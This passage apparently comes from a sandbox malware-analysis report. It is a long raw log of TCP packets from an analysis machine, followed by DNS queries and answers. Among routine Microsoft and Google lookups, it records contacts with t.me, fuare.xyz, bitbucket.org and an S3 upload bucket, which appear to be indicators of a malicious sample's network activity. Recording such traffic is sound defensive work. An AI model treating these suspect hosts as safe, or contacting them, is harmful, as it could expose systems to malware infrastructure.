                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.550095081 CET44350045116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.550148964 CET50045443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.550748110 CET50045443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.550751925 CET44350045116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.552681923 CET50045443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.552685976 CET44350045116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.552716017 CET50045443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.552721024 CET44350045116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.595805883 CET4435004613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.595957041 CET4435004613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.596009016 CET50046443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.596009016 CET50046443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.690372944 CET4435004713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.691921949 CET50047443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.691984892 CET4435004713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.694371939 CET4435004713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.694463968 CET50047443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.695555925 CET50047443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.695683956 CET4435004713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.695796013 CET50047443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.695812941 CET4435004713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.793524027 CET50047443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.895728111 CET4435004913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.895941019 CET50049443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.895957947 CET4435004913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.897470951 CET4435004913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.897552967 CET50049443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.897810936 CET50049443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.897897005 CET4435004913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.897965908 CET50049443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.939367056 CET4435004913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.958898067 CET4435004713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.958962917 CET4435004713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.958986044 CET4435004713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.959029913 CET4435004713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.959060907 CET4435004713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.959084034 CET4435004713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.959170103 CET50047443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.959171057 CET50047443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.959171057 CET50047443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.959243059 CET4435004713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.959311962 CET50047443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.001813889 CET50049443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.001844883 CET4435004913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.082436085 CET4435004713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.082448006 CET4435004713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.082525969 CET4435004713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.082650900 CET50047443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.082652092 CET50047443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.082722902 CET4435004713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.083254099 CET50047443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.109287977 CET50049443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.124672890 CET44350053172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.125021935 CET50053443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.125082016 CET44350053172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.125379086 CET44350052172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.125538111 CET50052443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.125550032 CET44350052172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.126754999 CET44350053172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.126895905 CET50053443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.126980066 CET44350052172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.127028942 CET50052443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.128446102 CET50052443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.128536940 CET44350052172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.128701925 CET50053443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.128783941 CET50052443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.128801107 CET44350053172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.128802061 CET44350052172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.128906012 CET50053443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.128925085 CET44350053172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.134104967 CET44350054162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.134339094 CET50054443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.134396076 CET44350054162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.137509108 CET44350054162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.137604952 CET50054443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.138354063 CET50054443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.138437986 CET44350054162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.138562918 CET50054443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.148004055 CET4435004913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.148063898 CET4435004913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.148086071 CET4435004913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.148103952 CET4435004913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.148142099 CET4435004913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.148140907 CET50049443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.148161888 CET4435004913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.148168087 CET50049443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.148190975 CET4435004913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.148190975 CET50049443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.148202896 CET50049443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.148247957 CET50049443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.179363966 CET44350054162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.282768965 CET50053443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.288984060 CET50052443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.289194107 CET50054443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.289253950 CET44350054162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.329648972 CET50057443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.329684973 CET44350057172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.329771996 CET50057443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.330267906 CET50058443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.330353022 CET44350058162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.330441952 CET50058443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.330591917 CET50059443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.330599070 CET44350059172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.330648899 CET50059443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.330914021 CET50057443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.330925941 CET44350057172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.331089020 CET50058443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.331125021 CET44350058162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.331171036 CET50059443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.331180096 CET44350059172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.396765947 CET50054443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.404828072 CET4435004713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.404838085 CET4435004713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.404881001 CET4435004713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.404925108 CET50047443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.404999971 CET4435004713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.405071974 CET50047443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.405150890 CET50047443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.406757116 CET44350053172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.406847000 CET44350052172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.406944036 CET44350053172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.406948090 CET44350052172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.407010078 CET50052443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.407022953 CET50053443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.407023907 CET4435004913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.407066107 CET4435004913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.407085896 CET50049443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.407094002 CET4435004913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.407143116 CET50049443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.407146931 CET4435004913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.407167912 CET4435004913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.407187939 CET4435004913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.407195091 CET50049443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.407212019 CET50049443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.407212973 CET4435004913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.407253027 CET50049443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.407336950 CET50052443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.407349110 CET44350052172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.407546043 CET50053443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.407577991 CET44350053172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.407605886 CET44350054162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.407763004 CET44350054162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.407857895 CET50054443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.407979965 CET4435004713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.407994032 CET4435004713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.408052921 CET50047443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.408068895 CET4435004713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.408252954 CET50047443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.408605099 CET50054443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.408622980 CET44350054162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.412338972 CET4435004913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.412360907 CET4435004913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.412399054 CET50049443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.412401915 CET4435004913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.412429094 CET50049443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.412430048 CET4435004913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.412453890 CET50049443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.412457943 CET4435004913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.412691116 CET50049443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.412942886 CET44350045116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.413002968 CET44350045116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.413033962 CET50045443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.413044930 CET50045443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.413816929 CET44350055116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.413924932 CET50055443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.414799929 CET50055443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.414803982 CET44350055116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.415076017 CET50045443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.415086031 CET44350045116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.416505098 CET50055443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.416508913 CET44350055116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.416554928 CET50055443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.416567087 CET44350055116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.416723013 CET50055443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.416749001 CET44350055116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.416893005 CET50055443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.417150974 CET44350055116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.449512959 CET4435004713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.449579954 CET4435004713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.449723005 CET50047443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.449723005 CET50047443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.449789047 CET4435004713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.450103045 CET50047443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:19.498749971 CET4435004913.107.246.45192.168.2.5

                                                                                                                                                                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.255491972 CET192.168.2.51.1.1.10xe9c8Standard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:42.562597036 CET192.168.2.51.1.1.10x6a82Standard query (0)fuare.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:01.357280970 CET192.168.2.51.1.1.10xe6e3Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:01.357449055 CET192.168.2.51.1.1.10x5bf3Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:07.081986904 CET192.168.2.51.1.1.10x8056Standard query (0)apis.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:07.082190037 CET192.168.2.51.1.1.10xc399Standard query (0)apis.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:13.909111023 CET192.168.2.51.1.1.10x55ecStandard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:13.909415960 CET192.168.2.51.1.1.10x63a1Standard query (0)ntp.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:15.322175026 CET192.168.2.51.1.1.10xeff6Standard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:15.323007107 CET192.168.2.51.1.1.10x41d4Standard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:16.062202930 CET192.168.2.51.1.1.10x76fcStandard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:16.062411070 CET192.168.2.51.1.1.10xa4f0Standard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:16.809578896 CET192.168.2.51.1.1.10x3bddStandard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:16.809719086 CET192.168.2.51.1.1.10xb3ffStandard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:16.813431978 CET192.168.2.51.1.1.10x13d0Standard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:16.814315081 CET192.168.2.51.1.1.10xd2a0Standard query (0)assets.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:16.834531069 CET192.168.2.51.1.1.10x66d7Standard query (0)c.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:16.834705114 CET192.168.2.51.1.1.10x2675Standard query (0)c.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:16.851178885 CET192.168.2.51.1.1.10xf9b5Standard query (0)api.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:16.851269960 CET192.168.2.51.1.1.10xc8b1Standard query (0)api.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.502371073 CET192.168.2.51.1.1.10xaa0Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.502496958 CET192.168.2.51.1.1.10x1f63Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.502748966 CET192.168.2.51.1.1.10x27fbStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.502855062 CET192.168.2.51.1.1.10x807cStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.509309053 CET192.168.2.51.1.1.10xbe10Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:18.509464979 CET192.168.2.51.1.1.10xc02bStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:48.374809980 CET192.168.2.51.1.1.10xd5c8Standard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:50.221350908 CET192.168.2.51.1.1.10x4e95Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:27:22.998538017 CET192.168.2.51.1.1.10xe36aStandard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:28:15.190577030 CET192.168.2.51.1.1.10x7a9cStandard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:28:43.001388073 CET192.168.2.51.1.1.10xfe29Standard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:29:23.112529993 CET192.168.2.51.1.1.10xd4feStandard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:30:23.174206018 CET192.168.2.51.1.1.10x6b2fStandard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:31:15.221040964 CET192.168.2.51.1.1.10x4edStandard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:32:19.150811911 CET192.168.2.51.1.1.10x35b4Standard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:33:31.204370022 CET192.168.2.51.1.1.10x7cfaStandard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:41.264772892 CET1.1.1.1192.168.2.50xe9c8No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
